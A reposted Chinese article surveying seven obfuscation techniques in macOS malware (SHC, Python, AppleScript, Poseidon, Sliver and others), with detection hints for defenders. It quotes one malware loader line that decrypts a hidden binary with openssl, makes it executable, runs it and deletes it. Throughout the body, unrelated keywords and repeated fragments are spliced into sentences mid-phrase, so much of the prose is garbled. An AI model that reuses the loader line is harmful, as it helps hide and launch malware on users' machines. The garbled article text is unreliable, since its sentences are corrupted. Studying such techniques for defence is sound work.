数据观澜系统运维
快捷导航
您的位置:首页>数据库>>MacOS 上常见的七种混淆技术 >

MacOS 上常见的七种混淆技术

  发布时间:2025-12-07 15:02:50   作者:玩站小弟   我要评论
MacOS 平台的威胁日渐增多,攻击者也越来越重视针对该平台的用户的攻击,本文将会介绍七种 macOS 上常见的混淆技术。混淆的 Shell 脚本 Shell 脚本可能是 Linux 平 。

MacOS 平台的混淆威胁日渐增多 ,攻击者也越来越重视针对该平台的技术用户的攻击 ,本文将会介绍七种 macOS 上常见的混淆混淆技术。

混淆的技术 Shell 脚本

Shell 脚本可能是 Linux 平台下最常见的恶意文件,在 macOS 上也不遑多让 。混淆许多恶意软件都将 Shell 脚本作为应用程序中的技术可执行文件 ,如下所示 。混淆

混淆的技术 Shell 脚本

也有攻击者直接将脚本内置在镜像文件中,源码下载通过别名来诱导用户执行 :

文件中的混淆脚本

在安装镜像文件时 ,会看到教育用户打开恶意软件并绕过内置的技术 Gatekeeper 安全机制 。

提示信息

要求用户点击的混淆安装 PKG 图标其实是一个隐藏目录中的 Shell 脚本的别名,名称为 .hidden 。技术该脚本经过轻微混淆 ,混淆在 /tmp 目录下使用随机 12 个字符创建一个目录后 ,技术会完成去混淆执行并删除从同一目录中的混淆数据文件中提取的可执行文件 :

复制/bin/bash -c eval $(echo openssl enc -aes-256-cbc -d -A -base64 -k \ $archive\ - in \ $appDir/$archive\ -out \ $ tmpDir/$binFile\ xattr -c \ $tmpDir/\ * chmod 777\ $tmpDir/$binFile\ \ $tmpDir/$binFile\ && rm -rf $tmpDir )1.2.3. 混淆的 SHC

Shell Script Compiler 是模板下载将 Bash 脚本编译生成可执行文件的技术 ,尽管这些可执行文件并不能做到完全独立,仍然需要执行环境中包含指定的 Shell 。

Shell Script Compiler

SHC 的 -U 参数可以使编译后的二进制文件无法使用 ptrace 进行跟踪,-e 参数支持设置程序终止运行的到期日期 。如果使用不同的 -e 参数  ,相同的脚本就可以生成不同哈希的二进制文件 。

Shell Script Compiler

SHC 被 SCSSET 恶意软件大量使用,云计算在野能够持续发现相关样本。从攻击者的角度来看 ,使得编写无法通过静态分析读取的恶意脚本变得非常简单。而且,通过 -e 参数还能够无限生成不同哈希值的样本文件 。

Shell Script Compiler

发现 SHC 编译的二进制文件  ,唯一的方法就是通过沙盒执行观察其行为。静态检测发现 SHC 编译的二进制文件时可以将其认为是可疑的高防服务器,编译器生成的独特字符串也利于检测 ,但实际上只有通过执行才能准确区分是否恶意。

混淆的 Python 脚本

苹果公司已经在 Monterey 12.3 及更高版本的 macOS 设备上取消了对 Python 2.7 的支持,所以针对 macOS 平台的攻击者已经对 Python 不再热衷。

混淆的 Python 脚本

将 Python 脚本打包 .pyc 编译好的 Mach-O 文件仍然是存在的攻击媒介 ,亿华云更常见的则是将框架如 Meterpreter 经过多次 base64 编码混淆处理,这就足以绕过许多检测引擎。

混淆的 Python 脚本

混淆的 Cobalt Strike

Cobalt Strike 在 Windows 平台非常常见  ,在 macOS 上出现甚少 ,但也不是完全没有 。

2021 年 9 月,OSX.Zuru 发起了供应链攻击 ,针对使用 iTerm2 、Mac 版 MS 远程桌面、SecureCRT 和 Navicat 14 进行投毒。恶意软件使用 UPX 加壳 ,源码库解压后是一个使用 C 语言编写的 Mach-O 文件 。该可执行文件经过混淆,包含超过 4 万个垃圾函数。相同的混淆方式,后来也出现在针对 PyPI 的 pymafka 供应链攻击中  。

混淆的 Cobalt Strike

该混淆技术能够通过二进制段的熵和哈希中进行识别 。例如 ,__cstring 段的 MD5 哈希值为 c5a055de400ba07ce806eabb456adf0a ,其熵值也能用于静态识别特征 :

混淆的 Cobalt Strike

混淆的 AppleScript

AppleScript 一直是被低估的攻击向量 ,其在 macOS 系统中的存在时间甚至比 Python 都要长。最近几年苹果公司不再给予其过多的关注 ,但仍然通过 TCC 等其他机制来对其进行限制。

混淆的 AppleScript

AppleScript 能够通过 run-only 选项来生成几乎不可逆向恢复的编译后代码 。在野发现的恶意软件中,有使用四字节十六进制字符编码将一个 run-only 的脚本嵌入到另一个脚本中。

混淆的 AppleScript

此类脚本无法使用内置工具进行反编译 ,需要进行动态分析或者手动的逆向工程 。想要静态检测的话 ,可以检测嵌入的十六进制字符和标记 AppleScript 块结尾的 Magic Number:FADE DEAD  。

Poseidon 恶意软件

Poseidon 是攻击框架 Mythic 的 Golang 版本 ,可以使攻击者操纵失陷主机  。最近一次高调的攻击,是针对 Rust 开发社区的 CreateDepression 供应链攻击 。

Poseidon 恶意软件

左侧为源代码,右侧是反汇编代码。Poseidon 支持攻击者与失陷主机中间发送与接收文件,还支持获取按键记录 、屏幕截图并进行持久化等 。已编译的 Poseidon 二进制文件中的字符串具有独特的特征,很容易检测。

Sliver 恶意软件

开源框架 Sliver 被在野使用的越来越频繁 ,可以通过 DNS 、HTTPS、双向 TLS 和 Wireguard 为攻击者提供 C&C 信道 。

Sliver 二进制文件多达 10MB 甚至更多 ,尽管 Sliver 本身不支持混淆或加壳 ,但在野发现了原始与定制的 UPX 加壳方案 。

Sliver 恶意软件

近期发现的 macOS 恶意软件 ,伪装成 Apple 软件更新二进制文件并在用户的 Library LaunchAgents 文件夹中进行持久化。该攻击避免使用任何 Apple 专有软件 ,并使用各种免费的工具(UPX、MacDriver 与 Platypus) 。

结论

以上介绍的混淆机制并不是全部,攻击者也在不断精进 ,研究更多 、更先进的混淆方式 ,例如 Pirrit、Adload 与 SliverSparrow 等 。

苹果仍然在尝试阻止绕过 Gatekeeper 安全设置的各种下载 ,预计以后会有更多的恶意软件在初始载荷中就嵌入后续的 Payload,并且结合更多的混淆和规避技术 。

  • Tag:

相关文章

  • 2024年影响安全行业的五大技术趋势

    即使对于我们这些在科技行业工作了几十年的人来说,过去 12 个月的变化速度也是惊人的。我们再一次确信,技术创新既带来了巨大的机遇,也带来了比我们以前面临的更复杂的挑战,而且没有任何放缓的迹象。
    2025-12-07

  • 新时期人才驱动的安全战略大揭秘!

    在“数字中国”战略的磅礴浪潮之下,网络安全已然跃升为维系国家经济命脉、社会稳定和公民隐私安全的战略基石。然而,随着人工智能AI)、大数据技术在国内快速发展,数据作为核心生产要素的战略地位凸显,同时,国
    2025-12-07

  • 全面 MCP 安全清单:守护 AI 驱动型基础设施安全

    当前,各行业组织纷纷加速布局 AI 驱动型基础设施,全力打造 “AI 为先” 的运营模式。然而,安全防护建设却明显滞后,成为一大短板。基于大型语言模型LLMs)和多组件协议MCP)构建的多智能体系统,
    2025-12-07

  • 北大青鸟昌平校区(深入剖析北大青鸟昌平校区的教学环境、师资力量和学生评价)

    北大青鸟昌平校区作为北大青鸟教育集团旗下的一家分校,致力于培养优秀的IT人才。在这个信息技术蓬勃发展的时代,选择一所良好的培训机构对于学生来说至关重要。本文将从教学环境、师资力量和学生评价等方面对北大
    2025-12-07

  • 自动化时代的网络安全:人工智能如何提供帮助?

    自动化和网络安全的挑战扩大攻击面:自动化引入了一系列互连的设备和系统,扩大了网络犯罪分子的攻击面。这些复杂的攻击可以利用网络和设备上的漏洞。人工智能在加强网络安全方面的作用威胁检测和预防:人工智能驱动
    2025-12-07

  • 惠威D1080-IV音质测评(惠威D1080-IV音箱的声音表现如何?)

    惠威D1080-IV是一款备受好评的音箱,它以其出色的音质而闻名。本文将对惠威D1080-IV的音质进行详细测评,探究它在各种音乐类型和场景下的表现,为音乐爱好者提供参考。一:低频表现出色,深沉有力惠
    2025-12-07

最新评论